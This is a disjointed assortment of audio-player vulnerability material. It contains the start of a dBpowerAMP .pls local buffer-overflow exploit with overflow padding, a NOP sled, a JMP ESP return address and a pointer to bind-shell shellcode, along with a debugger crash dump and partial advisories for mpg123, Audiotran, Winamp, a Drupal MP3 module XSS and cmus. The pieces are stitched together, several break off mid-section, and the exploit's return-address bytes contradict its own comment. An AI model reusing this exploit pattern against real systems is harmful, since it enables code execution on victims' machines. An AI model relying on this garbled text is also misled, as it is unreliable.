* simo36.c
* CODED By SimO-s0fT (Morrocco-->marrakesh city)
* Home : Exploiter-ma.com
* e-mail: maroc-anti-connexion[at]hotmail.com[dot]com
*greetz : Stack & Djekmani4ever & alphanix & all friends
* dBpowerAMP Audio Player local buffer overflow exploit
*
* This exploit was tested on Windows trus SP2.
* There is a small problem with the farm, but fortunately I managed to use it,
* and remember that this exploit has been working on trus Win.
* I tested on WinXP SP1 and found another problem.
# dBpowerAMP Audio Player v2 ( .pls file) LoCaL BufferOverFlow Exploit
# Exploited By AlpHaNiX
# From NullArea.Net
# Thanks Stack For The PoC
system("cls") ;
print "\n\n\n[+] dBpowerAMP Audio Player v2 ( .pls file) LoCaL BufferOverFlow Exploit" ;
my $blah = "\x41" x 600;   # padding to reach the saved return address
my $nop  = "\x90" x 52;    # NOP sled
my $ret  = "\xC7\xEB\xFA\x75" ; # 77C80F1A JMP ESP [ntdll v6.0 vista en ultimate]
# Note: the four bytes above, read little-endian, are 0x75FAEBC7, not 77C80F1A as the
# comment claims; the comment and the bytes in the original do not agree.
# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
An error in mpg123 might allow for the execution of arbitrary code.
Background
==========
mpg123 is a realtime MPEG 1.0/2.0/2.5 audio player for layers 1, 2 and 3.
Affected packages
=================
dBpowerAMP Audio Player Release 2 Remote Buffer Overflow
0:002> r
eax=00000000 ebx=77c17a50 ecx=00000000 edx=00000107 esi=00000000 edi=00b8f217
eip=00004141 esp=00b8ede0 ebp=77c0f931 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
00004141 ?? ???
EXCEPTION_RECORD: ffffffff -- (.exr ffffffffffffffff)
0x01 : Vendor description of software
-------------------------------------
From the vendor website:
"Audiotran is an audio player with speed and pitch changer."
0x02 : Vulnerability details
----------------------------
Audiotran suffers from a stack overflow in the handling of playlist files.
> DoS is not software crash, DoS is Denial of Service. It means,
> security impact of DoS vulnerability should be preventing (blocking)
> access of legitimate user to some data or service (via data
> corruption, service malfunction, etc).
It seems we have a different understanding of the term "Denial of Service". In my opinion your explanation exactly matches this issue. As you said, DoS is the attempt to make a (computer) resource unavailable to its user via data corruption etc. Here Winamp is the computer resource and the M3U file is the corrupted data. Sure, the user can easily recover from this "DoS" by restarting the audio player, and to be exact the M3U file is not a great example of corrupted data, but I would still call this issue a DoS bug.
How would you name it? "Winamp 5.35 (Infinite) M3U File Inclusion Stack Overflow Exception"?
Best regards,
Thomas Waldegger
-----------------------------
Drupal is a free software package that allows an individual or a
community of users to easily publish, manage and organize a wide
variety of content on a website. (From: http://drupal.org/about)
The MP3 Player module allows users to use the WordPress Audio Player in Drupal.
The name of the MP3 file is not properly sanitized when the JavaScript
that creates the audio player is generated, resulting in a cross-site
scripting vulnerability.
Background
==========
The C* Music Player (cmus) is a modular and very configurable
ncurses-based audio player.
Affected packages
=================
-------------------------------------------------------------------